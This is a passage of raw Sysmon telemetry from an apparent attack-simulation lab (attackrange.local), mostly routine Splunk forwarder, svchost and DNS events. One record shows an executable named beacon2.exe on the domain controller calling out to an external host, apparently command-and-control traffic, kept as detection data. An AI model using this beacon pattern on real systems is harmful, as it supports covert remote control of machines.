12:25:05.473{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-56401-false127.0.0.1-53domain 10341000x8000000000000000441403Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:09.236{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441402Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:09.236{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292877Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.429{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50647-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000441411Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:10.933{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36BF80BD887F59B94E3DBA99C1F84276,SHA256=D63504C055E9201F64BA9CE520F21AF20286CD4F1E21C6D93EE97F3C45EA48CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292914Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:10.677{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BF64C5C6C78C885D2DE502B5796A601,SHA256=3D49B4AC9D7A526F3844C720AEB48ED2E69CA0AD904A67403281690F110D8004,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441410Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:10.460{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9EBC56EF35814CDAF90DC9F49258200F,SHA256=656FA5D048B5B458B2A1C09C0F4BE6F4BF8A49FF71079A88A0C0207AF206C644,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441409Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:07.693{42DC5269-15AB-6087-FD0C-00000000BA01}5180C:\Users\Administrator\Desktop\beacon2.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-932.attackrange.local62423-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x8000000000000000441408Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:10.237{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441407Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:10.237{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292913Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:06.727{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50648-false52.111.245.4-443https 23542300x8000000000000000292912Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:10.223{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE118B680C9BDBAB41AFF8E700C09E08,SHA256=64705BD24EBFB7E0599366DF6321E05870DDB9C611B7F1338EF567A65CD660DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292916Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:11.679{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B6F366F211F2325C105DB685BC85AC9,SHA256=A59AA4DC15EB51D0EF3F2EE895F1DB518C3BD158F4A35B2697ADF7494B972710,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441413Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:11.238{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441412Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:11.238{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292915Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:08.517{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50649-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000292917Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:12.681{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2438015E1C8895B73904865FA3B5D3E5,SHA256=A2A3EEA5A7EE182EA0BF498263C31E505472DB2A7E4B5B66489217F6B873B2A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441417Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:12.239{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441416Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:12.239{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441415Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:12.110{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68EBF8238FDC379A671127C368CDAAA7,SHA256=AAEF2609EB8AD2730BAC7608D0E15E52A3DA967AE5DC7265E579F98E529FD5EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441414Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:12.060{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30BBCD702CEB32554FA8A3EB3E2756B,SHA256=5499A4580A6D0A5C1335F1FE5B4881BC86E7D55A3DC7D4CF29D57126AFC51C50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292919Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:13.698{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1AF16E73C9668D48355FB7B22ACEB8C,SHA256=7C9A64BD21B0C2E832A0C0B88903793B4E7FA002F52A22590E852C427BE1B829,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441421Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:09.561{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62424-false10.0.1.12-8000- 23542300x8000000000000000441420Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:13.293{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A3CA925C0EDE2C0E13BCCEDA82CC5AD,SHA256=ED60D5A861EE1CDCE9F868F987EAD5BA15D848B7092B8C19C0D63A3BB7AB2DBC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292918Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:13.582{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441419Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:13.239{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441418Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:13.239{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292923Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:14.885{BEA10069-D0C2-6086-1300-00000000BB01}344NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=DB18D35FFD7FA293B981F80555500896,SHA256=D044E2FF15F0404A20557C2C660F6B8ED10052E82D5596AA19CC32FDB737A5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292922Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:14.700{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BDA681FEA226DB7CC3E65A805DD2AEC,SHA256=682358A74B26F6623AEF78A240B8E2BD8BE2ACFD81911F00AB9AD5ECEC9DA264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441424Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:14.524{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E920909B6762706246A101A7EAEA168,SHA256=41DDF00F7A33F92FF21D3F877A53B5E8B5E18F69900C32EE36BC5C80C97420F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292921Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:14.669{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292920Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:14.531{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1C89FA210B0D21EBDFF1F9B4CF1988ED,SHA256=3F18A09A9AC7B425B01F4C9888E5CC629BF73D813BE0CD9ACF20232E82C6C6C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441423Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:14.240{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441422Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:14.240{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292924Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:15.702{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63954C56939B95F8AE1592C500FC35EF,SHA256=4B063B9D4CD16D8ABA8811DEE5DBFDCF2139D6F4DEC933EB4BB93A78AA01CAD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441428Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:15.532{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90612FCACC14D569C79F626AF2F89364,SHA256=E9D93E96F3F1545F8D756090F225B066DD229BCACDB6F6B99DE2F75CBC4AA43B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441427Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:15.241{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441426Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:15.241{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441425Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:15.232{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3381EAF7F3863FD2B1D8A90EF5EDF8D,SHA256=E214CB1EE49FCF00B52A15FC493E55F9A0546330997D53D0BE895395CB61D7A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292927Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:16.754{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB7FA339EEEA2213F3F01BCDA9DC009C,SHA256=3DFCF355AD363D5FC516C131A0EE4000E326956B39C37C8C3233A3327C4FA81C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441433Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:12.855{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local52413- 23542300x8000000000000000441432Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:16.543{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64D083294EA9EC3BD0D65FD9C48A9A8F,SHA256=859E82579BB5F8556E0AE31F68B98BED3D34161B6BC7EDD81DEE92ABAD2FD29B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441431Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:16.541{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC73289E1877B69995A09E44E5D7C751,SHA256=345669F7EF11BF85FDDE82C8FAA6EF792F97896CB0313DEA897465CE9D91EDA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292926Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:14.529{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50650-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000292925Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:16.235{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 